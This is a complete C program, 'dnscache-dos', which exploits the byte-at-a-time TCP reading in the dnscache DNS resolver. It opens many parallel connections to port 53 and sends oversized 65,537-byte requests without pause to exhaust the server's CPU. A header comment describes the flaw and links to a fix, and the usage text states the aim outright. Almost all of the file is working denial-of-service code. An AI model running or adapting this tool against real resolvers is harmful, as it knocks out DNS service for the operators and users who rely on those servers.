
/*
 * dnscache reads incoming TCP connections one byte at a time
 * (see t_rw() function in dnscache.c), so that a single TCP packet can
 * trigger up to 65538 calls to poll() and 65538 calls to read(), thus
 * quickly burning a lot of CPU cycles.
 * 
 * fix: http://download.pureftpd.org/misc/dnscache-dont-read-tcp-one-byte-at-a-time.diff
 */

#include <sys/types.h>
#include <sys/ioctl.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <assert.h>
#include <errno.h>
#include <netdb.h>
#include <poll.h>
#include <signal.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <time.h>
#include <unistd.h>

/* Number of parallel connections used when none is given on the command line. */
#define DEFAULT_CONCURRENT_CONNECTIONS 200U
/* poll() timeout, in milliseconds, used between two connection start-ups in main(). */
#define DELAY_BETWEEN_CONNECTIONS 100
/* Socket send/receive timeout, in seconds (SO_SNDTIMEO / SO_RCVTIMEO). */
#define TIMEOUT 10
/* Service string handed to getaddrinfo() for the remote end. */
#define REMOTE_PORT "53"

/*
 * Life cycle of a Connection.
 *
 * STATE_FREE       - no usable socket: set by connection_close() and at the
 *                    start of connection_connect().
 * STATE_CONNECTING - connect() reported that the connection is in progress.
 * STATE_CONNECTED  - connect() succeeded immediately.
 * STATE_SENDING    - write() returned EAGAIN before the whole request was sent.
 * STATE_RECEIVING  - the whole request was written; waiting for readable data.
 */
typedef enum State_ {
    STATE_FREE, STATE_CONNECTING, STATE_CONNECTED, STATE_SENDING,
    STATE_RECEIVING
} State;

/* Per-connection bookkeeping; one instance per slot of the pollfd array. */
typedef struct Connection_ {
    /* Scratch buffer read() fills in connection_receive(); content is never inspected. */
    char                   reply_buf[65536U + 2U];
    /* Resolved remote address used for socket() and connect(); not owned here. */
    const struct addrinfo *ai;
    /* This connection's entry in the pollfd array passed to poll(). */
    struct pollfd         *poll_fd;
    /* Number of request bytes written so far on the current socket. */
    size_t                 pos;
    /* Socket descriptor of the current attempt. */
    int                    fd;
    /* Current step of the connect/send/receive cycle. */
    State                  state;
} Connection;

/*
 * Request sent on every connection.
 *
 * The first two bytes (0xff 0xff) are the DNS-over-TCP length prefix,
 * announcing a 65535-byte message. They are followed by a regular query for
 * google.com (ID 0x5c9e, flags 0x0100, one question, QTYPE 1, QCLASS 1).
 * The remaining bytes of the array are implicitly zero-initialized, so the
 * array really is 2 + 65535 bytes long, matching the announced length.
 */

static const unsigned char dummy_packet[65535U + 2U] = {
    0xff, 0xff,
    0x5c, 0x9e, 0x01, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
    0x06, 0x67, 0x6f, 0x6f, 0x67, 0x6c, 0x65, 0x03, 0x63, 0x6f, 0x6d, 0x00,
    0x00, 0x01, 0x00, 0x01
};

/* Forward declaration: connection_connect() calls it before its definition. */
static int connection_send(Connection * const connection);

/* Set to 1 by sig_handler(); main() polls it to leave its final loop. */
static volatile sig_atomic_t quit_pending;

/*
 * Count one more connection attempt and refresh the progress line on stdout.
 *
 * The line is rewritten in place (leading '\r') only when the wall-clock
 * second has changed since the previous refresh, so the output is throttled.
 * Always returns 0.
 */
static int
bump_and_show_connections_count(void)
{
    static unsigned int total;
    static time_t       last_shown;
    const time_t        now = time(NULL);

    total++;
    if (now == last_shown) {
        return 0;
    }
    printf("\rNumber of requests made so far: %u", total);
    fflush(stdout);
    last_shown = now;

    return 0;
}

/*
 * Resolve host/port into a list of TCP stream addresses (any address family).
 *
 * Returns the list produced by getaddrinfo(), which the caller releases with
 * freeaddrinfo(), or NULL after printing the resolver error on stderr.
 */
static struct addrinfo *
resolve(const char * const host, const char * const port)
{
    const struct addrinfo  hints = {
        .ai_flags = 0,
        .ai_family = AF_UNSPEC,
        .ai_socktype = SOCK_STREAM,
        .ai_protocol = IPPROTO_TCP
    };
    struct addrinfo       *result = NULL;
    const int              rc = getaddrinfo(host, port, &hints, &result);

    if (rc == 0) {
        return result;
    }
    fprintf(stderr, "[%s]: %s\n", host, gai_strerror(rc));

    return NULL;
}

/*
 * Close the connection's socket and mark the slot as free.
 *
 * close() is retried while it fails with EINTR; any other failure trips the
 * assertion. The pollfd entry stops requesting events. Always returns 0.
 */
static int
connection_close(Connection * const connection)
{
    int rc;

    do {
        rc = close(connection->fd);
    } while (rc != 0 && errno == EINTR);
    assert(rc == 0);

    connection->poll_fd->events = 0;
    connection->state = STATE_FREE;

    return 0;
}

/*
 * Start a new connection attempt for this slot.
 *
 * Creates a non-blocking socket for connection->ai, registers it in the
 * slot's pollfd entry (waiting for POLLOUT), resets the write position and
 * initiates connect(). If the connection is established immediately, the
 * request is sent right away through connection_send().
 *
 * Returns 0 when the connection is established or in progress, -1 when
 * connect() fails with ECONNRESET (the slot is then left in STATE_FREE with
 * the socket still registered for polling).
 */
static int
connection_connect(Connection * const connection)
{
    struct timeval         tv = { .tv_sec = TIMEOUT, .tv_usec = 0 };
    const struct addrinfo *ai = connection->ai;
    int                    connect_ret;
    int                    fd;
    int                    ioctl_ret;
    int                    nonblocking = 1;

    bump_and_show_connections_count();
    fd = socket(ai->ai_family, ai->ai_socktype, ai->ai_protocol);
    assert(fd != -1);
    /* Keep the call outside assert(): it must still run when NDEBUG is set. */
    ioctl_ret = ioctl(fd, FIONBIO, &nonblocking);
    assert(ioctl_ret == 0);
    (void) ioctl_ret;
    /* Best effort: a failure to set the timeouts is not fatal. */
    setsockopt(fd, SOL_SOCKET, SO_SNDTIMEO, &tv, sizeof tv);
    setsockopt(fd, SOL_SOCKET, SO_RCVTIMEO, &tv, sizeof tv);
    connection->state = STATE_FREE;
    connection->fd = fd;
    connection->pos = (size_t) 0U;
    *connection->poll_fd = (struct pollfd) {
        .fd = fd,
        .events = POLLOUT,
        .revents = 0
    };
    do {
        connect_ret =
            connect(fd, (const struct sockaddr *) connection->ai->ai_addr,
                    connection->ai->ai_addrlen);
    } while (connect_ret != 0 && errno == EINTR);
    if (connect_ret == 0) {
        connection->state = STATE_CONNECTED;
        connection_send(connection);
        return 0;
    }
    if (errno == ECONNRESET) {
        return -1;
    }
    /*
     * EALREADY is what a retry after EINTR reports: the interrupted attempt
     * keeps going asynchronously, exactly like EINPROGRESS.
     */
    assert(errno == EINPROGRESS || errno == EALREADY);
    connection->state = STATE_CONNECTING;

    return 0;
}

/*
 * Recycle a slot: close its current socket, then start a new connection.
 *
 * Returns 0 when both steps succeed and 1 otherwise; the new connection is
 * not attempted if closing fails.
 */
static int
connection_rearm(Connection * const connection)
{
    if (connection_close(connection) != 0) {
        return 1;
    }
    if (connection_connect(connection) != 0) {
        return 1;
    }
    return 0;
}

/*
 * Push the not-yet-sent part of dummy_packet to the socket.
 *
 * Writing resumes at connection->pos, so a request interrupted by a short
 * write or by EAGAIN continues where it stopped instead of starting over.
 * Once every byte has been written, the slot switches to waiting for
 * readable data (STATE_RECEIVING, POLLIN).
 *
 * Returns 0 when the whole request has been sent, -1 when the socket would
 * block (state becomes STATE_SENDING) or when the connection was lost and
 * has been re-armed. Note that re-arming may recurse into this function if
 * the new connection is established immediately.
 */
static int
connection_send(Connection * const connection)
{
    ssize_t written;

    assert((connection->poll_fd->events & POLLOUT) != 0);
    do {
        written = write(connection->fd, dummy_packet + connection->pos,
                        sizeof dummy_packet - connection->pos);
        if (written == (ssize_t) -1) {
            switch (errno) {
            case EAGAIN:
#if defined(EWOULDBLOCK) && EWOULDBLOCK != EAGAIN
            case EWOULDBLOCK:
#endif
                connection->state = STATE_SENDING;
                return -1;
            case EBADF:
            case ECONNRESET:
            case EPIPE:
#ifdef ENOTCONN
            case ENOTCONN:
#endif
                connection_rearm(connection);
                return -1;
            case EINTR:
                continue;
            default:
                /*
                 * Unexpected error: fatal in debug builds. With NDEBUG, start
                 * over rather than adding -1 to the write position.
                 */
                assert(0);
                connection_rearm(connection);
                return -1;
            }
        }
        connection->pos += (size_t) written;
    } while (connection->pos < sizeof dummy_packet);
    connection->poll_fd->events = POLLIN;
    connection->poll_fd->revents = 0;
    connection->state = STATE_RECEIVING;

    return 0;
}

/*
 * Consume whatever the server sent back, then recycle the connection.
 *
 * The reply content is irrelevant: as soon as read() returns anything
 * (data or end-of-file), the socket is closed and a new connection is
 * started through connection_rearm().
 *
 * Returns 0 after a successful read, -1 when no data is available yet
 * (EAGAIN) or when the connection was lost and has been re-armed.
 */
static int
connection_receive(Connection * const connection)
{
    ssize_t readnb;

    for(;;) {
        readnb = read(connection->fd, connection->reply_buf,
                      sizeof connection->reply_buf);
        if (readnb == (ssize_t) -1) {
            switch (errno) {
            case EBADF:
            case ECONNRESET:
#ifdef ENOTCONN
            case ENOTCONN:
#endif
                /*
                 * Return right after re-arming: the new socket is still
                 * connecting, and reading from it here would fail again and
                 * could re-arm in a tight loop.
                 */
                connection_rearm(connection);
                return -1;
            case EINTR:
                continue;
            case EAGAIN:
#if defined(EWOULDBLOCK) && EWOULDBLOCK != EAGAIN
            case EWOULDBLOCK:
#endif
                return -1;
            default:
                /* Fatal in debug builds; with NDEBUG, fall out and re-arm. */
                assert(0);
            }
        }
        break;
    }
    connection_rearm(connection);

    return 0;
}

/*
 * Run one poll() round over the first connections_count slots and advance
 * every connection that reported an event.
 *
 * A slot flagged with POLLERR, POLLHUP or POLLNVAL is re-armed first. Its
 * revents field is then read again, because re-arming rewrites the pollfd
 * entry. A slot that is readable or writable is dispatched according to its
 * state: connect, send or receive.
 *
 * Returns 0 in all cases, including a timeout or an interrupted poll().
 */
static int
event_loop(Connection * const connections,
           const unsigned int connections_count,
           struct pollfd * const poll_fds, const int timeout)
{
    Connection        *cur = connections;
    Connection * const end = connections + connections_count;
    const int          ready =
        poll(poll_fds, (nfds_t) connections_count, timeout);

    if (ready == 0) {
        return 0;
    }
    if (ready == -1 && errno == EINTR) {
        return 0;
    }
    assert(ready > 0);
    do {
        if ((cur->poll_fd->revents & (POLLERR | POLLHUP | POLLNVAL)) != 0) {
            connection_rearm(cur);
        }
        if ((cur->poll_fd->revents & (POLLIN | POLLOUT)) != 0) {
            const State state = cur->state;

            cur->poll_fd->revents = 0;
            if (state == STATE_RECEIVING) {
                connection_receive(cur);
            } else if (state == STATE_FREE) {
                connection_connect(cur);
            } else if (state == STATE_CONNECTED ||
                       state == STATE_CONNECTING ||
                       state == STATE_SENDING) {
                connection_send(cur);
            }
        }
        cur++;
    } while (cur < end);

    return 0;
}

/* Print the command-line help on stdout and terminate with exit status 1. */
static void
usage(void)
{
    static const char help_text[] =
        "\nUsage: dnscache-dos <host> [concurrent requests (default=200)]\n"
        "Burn CPU cycles on a dnscache resolver by sending large TCP requests\n\n"
        "A low number of concurrent requests like 2 or 3 is good enough.\n";

    puts(help_text);
    exit(1);
}

/*
 * Signal handler: only records that termination was requested. The signal
 * number is deliberately unused.
 */
static void
sig_handler(const int sig)
{
    quit_pending = (sig_atomic_t) 1;
    (void) sig;
}

/*
 * Entry point: dnscache-dos <host> [concurrent requests].
 *
 * Validates the optional connection count, resolves the target, allocates
 * one Connection and one pollfd per slot, then starts the connections one
 * by one, running a short poll round after each start-up. Once all slots
 * are active it keeps servicing events until SIGINT, SIGTERM or SIGQUIT is
 * received.
 *
 * Returns 0 on a signal-requested shutdown; exits with status 1 on a usage
 * error, a resolution failure or an allocation failure.
 */
int
main(int argc, char *argv[])
{
    Connection      *connections;
    struct addrinfo *ai;
    struct pollfd   *poll_fds;
    unsigned int     connections_count = DEFAULT_CONCURRENT_CONNECTIONS;
    unsigned int     i;

    if (argc <= 1 || argc > 3) {
        usage();
    }
    if (argc == 3) {
        char          *end;
        unsigned long  requested;

        errno = 0;
        requested = strtoul(argv[2], &end, 10);
        connections_count = (unsigned int) requested;
        /*
         * Reject non-numeric input, trailing garbage, zero, and values that
         * do not survive the conversion to unsigned int.
         */
        if (errno != 0 || end == argv[2] || *end != '\0' ||
            connections_count == 0U ||
            (unsigned long) connections_count != requested) {
            usage();
        }
    }
    if ((ai = resolve(argv[1], REMOTE_PORT)) == NULL) {
        exit(1);
    }
    /* Allocate outside assert(): the calls must still run when NDEBUG is set. */
    connections = calloc(connections_count, sizeof *connections);
    poll_fds = calloc(connections_count, sizeof *poll_fds);
    if (connections == NULL || poll_fds == NULL) {
        perror("calloc");
        free(connections);
        free(poll_fds);
        freeaddrinfo(ai);
        exit(1);
    }
    i = 0U;
    do {
        connections[i].ai = ai;
        connections[i].poll_fd = &poll_fds[i];
        connection_connect(&connections[i]);
        i++;
        /* Service the slots started so far while pacing the ramp-up. */
        event_loop(connections, i, poll_fds, DELAY_BETWEEN_CONNECTIONS);
    } while (i < connections_count);

    signal(SIGINT, sig_handler);
    signal(SIGTERM, sig_handler);
    signal(SIGQUIT, sig_handler);
    do {
        /* Blocks until an event or a signal; a signal makes poll() return. */
        event_loop(connections, connections_count, poll_fds, -1);
    } while (quit_pending == (sig_atomic_t) 0);

    freeaddrinfo(ai);
    free(connections);
    free(poll_fds);

    return 0;
}
